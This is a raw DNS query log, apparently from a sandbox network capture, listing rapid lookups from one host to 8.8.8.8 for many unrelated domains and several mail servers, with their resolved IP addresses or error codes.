                                                                                                                                                                              Sep 15, 2023 07:27:58.615984917 CEST8.8.8.8192.168.2.30xa55cNo error (0)jabian.com104.26.6.17A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.615984917 CEST8.8.8.8192.168.2.30xa55cNo error (0)jabian.com104.26.7.17A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.615984917 CEST8.8.8.8192.168.2.30xa55cNo error (0)jabian.com172.67.71.13A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.624232054 CEST8.8.8.8192.168.2.30x3537Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.726083040 CEST8.8.8.8192.168.2.30x920fServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.803050041 CEST8.8.8.8192.168.2.30xd087Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.905045986 CEST8.8.8.8192.168.2.30xe5b7Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.987613916 CEST8.8.8.8192.168.2.30x202fNo error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:59.004470110 CEST8.8.8.8192.168.2.30x6f23Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:59.038151979 CEST8.8.8.8192.168.2.30x8719No error (0)tbvlugus.nl174.129.25.170A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:59.239603996 CEST8.8.8.8192.168.2.30x4465Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:59.241918087 CEST8.8.8.8192.168.2.30x2613Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:59.314428091 CEST8.8.8.8192.168.2.30xeffeServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:59.522551060 CEST8.8.8.8192.168.2.30x930Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:59.565576077 CEST8.8.8.8192.168.2.30x73b5No error (0)acraloc.com185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:59.624083996 CEST8.8.8.8192.168.2.30xc94eName error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:59.712498903 CEST8.8.8.8192.168.2.30x99b7No error (0)atb-lit.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:59.803787947 CEST8.8.8.8192.168.2.30xdf52Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:59.831907034 CEST8.8.8.8192.168.2.30x743fNo error (0)okashimo.com203.137.75.45A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:59.936487913 CEST8.8.8.8192.168.2.30xda39No error (0)koz1.net72.251.233.245A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.035370111 CEST8.8.8.8192.168.2.30xbabfNo error (0)gmail-smtp-in.l.google.com172.253.63.26A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.047475100 CEST8.8.8.8192.168.2.30x5dc0No error (0)websy.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.047475100 CEST8.8.8.8192.168.2.30x5dc0No error (0)websy.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.055015087 CEST8.8.8.8192.168.2.30x202fNo error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.126965046 CEST8.8.8.8192.168.2.30x3009No error (0)x96.com104.21.73.229A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.126965046 CEST8.8.8.8192.168.2.30x3009No error (0)x96.com172.67.167.96A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.241034985 CEST8.8.8.8192.168.2.30xbc2dNo error (0)x96.com172.67.167.96A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.241034985 CEST8.8.8.8192.168.2.30xbc2dNo error (0)x96.com104.21.73.229A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.247112036 CEST8.8.8.8192.168.2.30x4465Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.316492081 CEST8.8.8.8192.168.2.30x3772No error (0)mcseurope.nl46.19.218.80A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.324878931 CEST8.8.8.8192.168.2.30xeffeServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.396898031 CEST8.8.8.8192.168.2.30x290eNo error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.396898031 CEST8.8.8.8192.168.2.30x290eNo error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.396898031 CEST8.8.8.8192.168.2.30x290eNo error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.396898031 CEST8.8.8.8192.168.2.30x290eNo error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.421982050 CEST8.8.8.8192.168.2.30x8d50No error (0)tcpoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.421982050 CEST8.8.8.8192.168.2.30x8d50No error (0)tcpoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.444566965 CEST8.8.8.8192.168.2.30xb26cNo error (0)ifesnet.com172.67.216.194A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.444566965 CEST8.8.8.8192.168.2.30xb26cNo error (0)ifesnet.com104.21.24.39A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.446850061 CEST8.8.8.8192.168.2.30x7a7aNo error (0)hes.pt52.19.230.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.467255116 CEST8.8.8.8192.168.2.30x216cNo error (0)zemarmot.net164.132.175.106A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.651196003 CEST8.8.8.8192.168.2.30x459aNo error (0)karmy.com.pl185.253.212.22A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.747776985 CEST8.8.8.8192.168.2.30xa856No error (0)hes.pt52.19.230.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.769252062 CEST8.8.8.8192.168.2.30xdc6eNo error (0)acraloc.com185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.804744959 CEST8.8.8.8192.168.2.30x9fefNo error (0)midap.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.804744959 CEST8.8.8.8192.168.2.30x9fefNo error (0)midap.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.804744959 CEST8.8.8.8192.168.2.30x9fefNo error (0)midap.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.804744959 CEST8.8.8.8192.168.2.30x9fefNo error (0)midap.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.886341095 CEST8.8.8.8192.168.2.30x64fcNo error (0)ascc.org.au203.210.102.34A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.943717957 CEST8.8.8.8192.168.2.30xb3d3No error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.952975035 CEST8.8.8.8192.168.2.30xe929No error (0)scip.org.uk104.26.12.244A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.952975035 CEST8.8.8.8192.168.2.30xe929No error (0)scip.org.uk104.26.13.244A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.952975035 CEST8.8.8.8192.168.2.30xe929No error (0)scip.org.uk172.67.72.150A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.998812914 CEST8.8.8.8192.168.2.30x231aNo error (0)atbauk.org172.67.196.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.998812914 CEST8.8.8.8192.168.2.30x231aNo error (0)atbauk.org104.21.92.170A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.000380993 CEST8.8.8.8192.168.2.30xe584No error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.020356894 CEST8.8.8.8192.168.2.30x6330No error (0)adventist.ro49.12.155.123A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.022011995 CEST8.8.8.8192.168.2.30x5788No error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.043040037 CEST8.8.8.8192.168.2.30x4b03Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.086218119 CEST8.8.8.8192.168.2.30x251fNo error (0)ludea.cz46.8.8.200A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.138636112 CEST8.8.8.8192.168.2.30xe85cNo error (0)holp-ai.com59.106.13.169A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.150053978 CEST8.8.8.8192.168.2.30xe5e1No error (0)kairel.com54.217.118.81A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.233767033 CEST8.8.8.8192.168.2.30x9d2fName error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.258445978 CEST8.8.8.8192.168.2.30x2613Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.260770082 CEST8.8.8.8192.168.2.30x4465Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.339715004 CEST8.8.8.8192.168.2.30xeffeServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.420279026 CEST8.8.8.8192.168.2.30xb02dNo error (0)websy.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.420279026 CEST8.8.8.8192.168.2.30xb02dNo error (0)websy.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.508769035 CEST8.8.8.8192.168.2.30xfd85No error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.509773016 CEST8.8.8.8192.168.2.30xfd85No error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.618062973 CEST8.8.8.8192.168.2.30x9d2fName error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.755073071 CEST8.8.8.8192.168.2.30xcdd4Name error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.763613939 CEST8.8.8.8192.168.2.30xcfe9No error (0)cyclad.pl87.98.236.253A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.855185032 CEST8.8.8.8192.168.2.30x2d4cName error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.945688963 CEST8.8.8.8192.168.2.30x66a1No error (0)redgiga.com172.67.186.153A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.945688963 CEST8.8.8.8192.168.2.30x66a1No error (0)redgiga.com104.21.76.38A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:01.955017090 CEST8.8.8.8192.168.2.30x57e8Name error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.017546892 CEST8.8.8.8192.168.2.30xfe5fServer failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.084949970 CEST8.8.8.8192.168.2.30x6b80Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.185949087 CEST8.8.8.8192.168.2.30xe024Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.220578909 CEST8.8.8.8192.168.2.30xee05No error (0)bigzz.by178.249.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.293903112 CEST8.8.8.8192.168.2.30xd66cName error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.298958063 CEST8.8.8.8192.168.2.30x152No error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.298958063 CEST8.8.8.8192.168.2.30x152No error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.298958063 CEST8.8.8.8192.168.2.30x152No error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.315680027 CEST8.8.8.8192.168.2.30xbea9No error (0)aiolos-sa.gr104.21.26.121A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.315680027 CEST8.8.8.8192.168.2.30xbea9No error (0)aiolos-sa.gr172.67.168.72A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.326416969 CEST8.8.8.8192.168.2.30xb6e7Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.455487967 CEST8.8.8.8192.168.2.30xfd85No error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.457530975 CEST8.8.8.8192.168.2.30x1262Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.487725019 CEST8.8.8.8192.168.2.30x1ac4No error (0)wvs-net.de104.21.43.163A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.487725019 CEST8.8.8.8192.168.2.30x1ac4No error (0)wvs-net.de172.67.181.113A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.521064997 CEST8.8.8.8192.168.2.30x7f3cNo error (0)e-kami.net202.172.28.89A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.542779922 CEST8.8.8.8192.168.2.30xd8No error (0)vonparis.com23.185.0.4A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.687691927 CEST8.8.8.8192.168.2.30x5c86No error (0)okashimo.com203.137.75.45A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.771961927 CEST8.8.8.8192.168.2.30x2679No error (0)johnlyon.org141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.863599062 CEST8.8.8.8192.168.2.30x5f06No error (0)bd-style.com103.112.69.92A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.882782936 CEST8.8.8.8192.168.2.30x90b1No error (0)kumaden.com49.212.180.178A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:02.883465052 CEST8.8.8.8192.168.2.30x6281No error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.064544916 CEST8.8.8.8192.168.2.30x8999Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.119893074 CEST8.8.8.8192.168.2.30x173Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.120465994 CEST8.8.8.8192.168.2.30x173Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.120699883 CEST8.8.8.8192.168.2.30x6010No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.120699883 CEST8.8.8.8192.168.2.30x6010No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.163425922 CEST8.8.8.8192.168.2.30x8a9cName error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.219275951 CEST8.8.8.8192.168.2.30x6472Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.278659105 CEST8.8.8.8192.168.2.30x4465Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.347799063 CEST8.8.8.8192.168.2.30xffd5No error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.358400106 CEST8.8.8.8192.168.2.30xeffeServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.414001942 CEST8.8.8.8192.168.2.30x602aNo error (0)dog-jog.net153.122.24.177A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.447271109 CEST8.8.8.8192.168.2.30x7ec5No error (0)vvsteknik.dk185.31.76.90A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.633322954 CEST8.8.8.8192.168.2.30x9ff2No error (0)noblesse.be5.134.4.115A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.761776924 CEST8.8.8.8192.168.2.30x368bNo error (0)ccssinc.com172.67.185.152A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.761776924 CEST8.8.8.8192.168.2.30x368bNo error (0)ccssinc.com104.21.19.68A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.773452044 CEST8.8.8.8192.168.2.30x2f68No error (0)shiner.com172.67.143.148A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.773452044 CEST8.8.8.8192.168.2.30x2f68No error (0)shiner.com104.21.27.205A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.850111008 CEST8.8.8.8192.168.2.30xb27cNo error (0)fundeo.com172.67.97.62A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.850111008 CEST8.8.8.8192.168.2.30xb27cNo error (0)fundeo.com104.24.160.27A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.850111008 CEST8.8.8.8192.168.2.30xb27cNo error (0)fundeo.com104.24.161.27A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.908399105 CEST8.8.8.8192.168.2.30x5fa0Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.911029100 CEST8.8.8.8192.168.2.30xc9b3No error (0)com-edit.fr63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:03.935535908 CEST8.8.8.8192.168.2.30x9b27No error (0)skgm.ru91.201.52.102A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.054318905 CEST8.8.8.8192.168.2.30xdecdNo error (0)karila.fr89.107.169.125A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.085414886 CEST8.8.8.8192.168.2.30xb9fcNo error (0)uster.com104.20.221.29A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.085414886 CEST8.8.8.8192.168.2.30xb9fcNo error (0)uster.com104.20.220.29A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.085414886 CEST8.8.8.8192.168.2.30xb9fcNo error (0)uster.com172.67.32.172A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.101248980 CEST8.8.8.8192.168.2.30xdabbNo error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.156958103 CEST8.8.8.8192.168.2.30xfea2No error (0)cubodown.com91.195.240.94A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.264492035 CEST8.8.8.8192.168.2.30x2836Name error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.272336960 CEST8.8.8.8192.168.2.30xdf58No error (0)avse.hu185.129.138.60A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.303442955 CEST8.8.8.8192.168.2.30xa99fNo error (0)apcotex.com35.154.163.204A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.335520983 CEST8.8.8.8192.168.2.30xb20eServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.392204046 CEST8.8.8.8192.168.2.30x2e3No error (0)rappich.de89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.413053036 CEST8.8.8.8192.168.2.30x5ab0Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.454102993 CEST8.8.8.8192.168.2.30xe61fNo error (0)windowsupdatebg.s.llnwi.net69.164.0.0A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.454102993 CEST8.8.8.8192.168.2.30xe61fNo error (0)windowsupdatebg.s.llnwi.net69.164.0.128A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.485363960 CEST8.8.8.8192.168.2.30x616eNo error (0)notis.ru185.178.208.141A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.516083002 CEST8.8.8.8192.168.2.30xf2eNo error (0)kallman.net0.0.0.0A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.549690008 CEST8.8.8.8192.168.2.30x5f5eNo error (0)adventist.ro49.12.155.123A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.551753998 CEST8.8.8.8192.168.2.30x8d5aName error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.635962009 CEST8.8.8.8192.168.2.30x48d4No error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.635962009 CEST8.8.8.8192.168.2.30x48d4No error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.635962009 CEST8.8.8.8192.168.2.30x48d4No error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.635962009 CEST8.8.8.8192.168.2.30x48d4No error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.652723074 CEST8.8.8.8192.168.2.30x8fe8No error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.798224926 CEST8.8.8.8192.168.2.30x46f3No error (0)ikulani.com157.7.107.88A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.830001116 CEST8.8.8.8192.168.2.30x1313Name error (3)arowines.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.836381912 CEST8.8.8.8192.168.2.30x9c83No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.836381912 CEST8.8.8.8192.168.2.30x9c83No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.930805922 CEST8.8.8.8192.168.2.30x57cName error (3)arowines.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.974397898 CEST8.8.8.8192.168.2.30xa770Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.984709024 CEST8.8.8.8192.168.2.30xa770Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:04.998524904 CEST8.8.8.8192.168.2.30xf064No error (0)semuk.com86.105.245.69A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.027630091 CEST8.8.8.8192.168.2.30xa25fNo error (0)nekono.net202.172.28.187A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.031785011 CEST8.8.8.8192.168.2.30x41d8Name error (3)arowines.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.063575983 CEST8.8.8.8192.168.2.30x81cfNo error (0)geecl.com194.76.27.77A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.075180054 CEST8.8.8.8192.168.2.30x26No error (0)cvswl.org172.67.149.45A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.075180054 CEST8.8.8.8192.168.2.30x26No error (0)cvswl.org104.21.55.151A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.250721931 CEST8.8.8.8192.168.2.30x31abNo error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.350878000 CEST8.8.8.8192.168.2.30xe4baNo error (0)wvs-net.de104.21.43.163A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.350878000 CEST8.8.8.8192.168.2.30xe4baNo error (0)wvs-net.de172.67.181.113A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.356547117 CEST8.8.8.8192.168.2.30xb20eServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.400759935 CEST8.8.8.8192.168.2.30x31bcNo error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.414361954 CEST8.8.8.8192.168.2.30x5ab0Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.423285007 CEST8.8.8.8192.168.2.30x5b7No error (0)smtp.sbcglobal.yahoo.comsmtp-sbc.mail.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.423285007 CEST8.8.8.8192.168.2.30x5b7No error (0)smtp-sbc.mail.yahoo.comsmtp1.sbc.mail.am0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.423285007 CEST8.8.8.8192.168.2.30x5b7No error (0)smtp1.sbc.mail.am0.yahoodns.net67.195.12.38A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.423285007 CEST8.8.8.8192.168.2.30x5b7No error (0)smtp1.sbc.mail.am0.yahoodns.net66.218.88.163A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.423285007 CEST8.8.8.8192.168.2.30x5b7No error (0)smtp1.sbc.mail.am0.yahoodns.net66.163.170.48A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.455348969 CEST8.8.8.8192.168.2.30xf00fNo error (0)mcseurope.nl46.19.218.80A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.476969004 CEST8.8.8.8192.168.2.30x2157No error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.570950031 CEST8.8.8.8192.168.2.30x5373Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.638869047 CEST8.8.8.8192.168.2.30xd5d8Name error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
